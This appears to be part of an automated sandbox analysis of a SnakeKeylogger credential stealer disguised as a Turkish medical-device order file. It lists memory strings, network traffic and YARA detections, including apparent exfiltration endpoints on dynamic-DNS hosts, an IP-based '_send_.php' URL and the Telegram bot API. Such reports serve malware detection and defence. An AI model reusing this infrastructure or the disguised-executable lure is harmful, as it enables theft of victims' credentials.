                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 06 Dec 2024 08:58:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeString found in binary or memory: http://localhost/calculator_server/requests.php
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1325849803.0000000003087000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49781 version: TLS 1.2
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_05573E280_2_05573E28
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_05576F900_2_05576F90
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_05574B010_2_05574B01
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_0557DFB40_2_0557DFB4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_076D3E680_2_076D3E68
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_076D55400_2_076D5540
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_076DB4C80_2_076DB4C8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_076D63280_2_076D6328
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_076D42A00_2_076D42A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_076D59680_2_076D5968
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_076D59780_2_076D5978
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_07B208A40_2_07B208A4
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 0_2_07B225180_2_07B22518
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AD2787_2_029AD278
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029A53627_2_029A5362
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029A71187_2_029A7118
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AC1487_2_029AC148
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AC7387_2_029AC738
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AC4687_2_029AC468
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029ACA087_2_029ACA08
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AE9887_2_029AE988
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029A69B07_2_029A69B0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029ACFAA7_2_029ACFAA
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029ACCD87_2_029ACCD8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029A9DE07_2_029A9DE0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AF9887_2_029AF988
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029A29E07_2_029A29E0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AE97A7_2_029AE97A
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029AF9797_2_029AF979
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_029A3E187_2_029A3E18
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_055695487_2_05569548
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556FC687_2_0556FC68
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05569C187_2_05569C18
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_055650287_2_05565028
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556E2587_2_0556E258
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556D5507_2_0556D550
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556295A7_2_0556295A
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556D5407_2_0556D540
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_055629687_2_05562968
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556DDF17_2_0556DDF1
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556D9997_2_0556D999
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556D9A87_2_0556D9A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_055600407_2_05560040
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556F8107_2_0556F810
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_055600067_2_05560006
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556F8017_2_0556F801
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_055650227_2_05565022
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556D0F87_2_0556D0F8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556CC8F7_2_0556CC8F
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556CCA07_2_0556CCA0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556EF517_2_0556EF51
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556EF607_2_0556EF60
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556EB087_2_0556EB08
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05560B307_2_05560B30
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05560B247_2_05560B24
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05568B917_2_05568B91
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556178F7_2_0556178F
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556F3B87_2_0556F3B8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_055617A07_2_055617A0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05568BA07_2_05568BA0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556F3A87_2_0556F3A8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556E2497_2_0556E249
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05561E707_2_05561E70
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556DE007_2_0556DE00
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556EAF87_2_0556EAF8
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05561E807_2_05561E80
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556E6B07_2_0556E6B0
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_0556E6A07_2_0556E6A0
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1325039921.000000000132E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1325849803.0000000003130000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1329802989.0000000007610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1325849803.00000000030DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1329561990.0000000006360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1329340585.00000000061A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000000.1291364221.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaWSlJ.exe" vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3758135366.0000000000F89000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeBinary or memory string: OriginalFilenameaWSlJ.exe" vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
